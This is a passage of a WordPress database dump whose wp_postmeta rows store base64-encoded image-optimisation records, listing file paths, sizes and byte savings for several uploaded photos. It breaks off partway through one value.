INSERT INTO `wp_postmeta` VALUES (29073, 1878, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMxNjAsImlkIjoiMTg3OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5ODcsInRpbWUiOjE0ODM1NTMxNjQsImlkIjoxODc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzEyMCwidGltZSI6MTQ4MzU1MzE2NywiaWQiOjE4Nzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyOTEzLCJ0aW1lIjoxNDgzNTUzMTcwLCJpZCI6MTg3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTIwMjAsInRpbWUiOjE0ODM1NTMxNzQsImlkIjoxODc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjU5LCJ0aW1lIjoxNDgzNTUzMTc4LCJpZCI6MTg3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU0NiwidGltZSI6MTQ4MzU1MzE4MSwiaWQiOjE4Nzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMjIzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MDMsInRpbWUiOjE0ODM1NTMxODQsImlkIjoxODc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzIyMy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjAyOSwidGltZSI6MTQ4MzU1MzE4OSwiaWQiOjE4Nzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjY5MywidGltZSI6MTQ4MzU1MzE5MiwiaWQiOjE4Nzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMyMjMtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMDEsInRpbWUiOjE0ODM1NTMxOTUsImlkIjoxODc4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29074, 1877, 'wpfc_optimisation_reduction', '20607'); 
INSERT INTO `wp_postmeta` VALUES (29075, 1877, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMyMDAsImlkIjoiMTg3NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3NjMsInRpbWUiOjE0ODM1NTMyMDMsImlkIjoxODc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjY0NiwidGltZSI6MTQ4MzU1MzIwNiwiaWQiOjE4Nzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNDU3LCJ0aW1lIjoxNDgzNTUzMjEwLCJpZCI6MTg3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTA5ODAsInRpbWUiOjE0ODM1NTMyMTQsImlkIjoxODc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTUxLCJ0aW1lIjoxNDgzNTUzMjE3LCJpZCI6MTg3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ1NSwidGltZSI6MTQ4MzU1MzIyMSwiaWQiOjE4Nzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTQwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MjgsInRpbWUiOjE0ODM1NTMyMjQsImlkIjoxODc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzE0MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTYzMCwidGltZSI6MTQ4MzU1MzIyOCwiaWQiOjE4Nzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMxNDAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU5NywidGltZSI6MTQ4MzU1MzIzMSwiaWQiOjE4Nzd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29076, 1876, 'wpfc_optimisation_reduction', '21948'); 
INSERT INTO `wp_postmeta` VALUES (29077, 1876, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTMyMzksImlkIjoiMTg3NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3NjcsInRpbWUiOjE0ODM1NTMyNDIsImlkIjoxODc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzEyNS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzEyNS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzEyNS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjcwOSwidGltZSI6MTQ4MzU1MzI0NiwiaWQiOjE4NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNDY2LCJ0aW1lIjoxNDgzNTUzMjQ5LCJpZCI6MTg3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxMjUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0zMTI1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMxMjUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTE1NDcsInRpbWUiOjE0ODM1NTMyNTQsImlkIjoxODc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzEyNS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMzEyNS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMzEyNS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTUwLCJ0aW1lIjoxNDgzNTUzMjU3LCJpZCI6MTg3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxMjUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTMxMjUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTMxMjUtMjAweDIwMC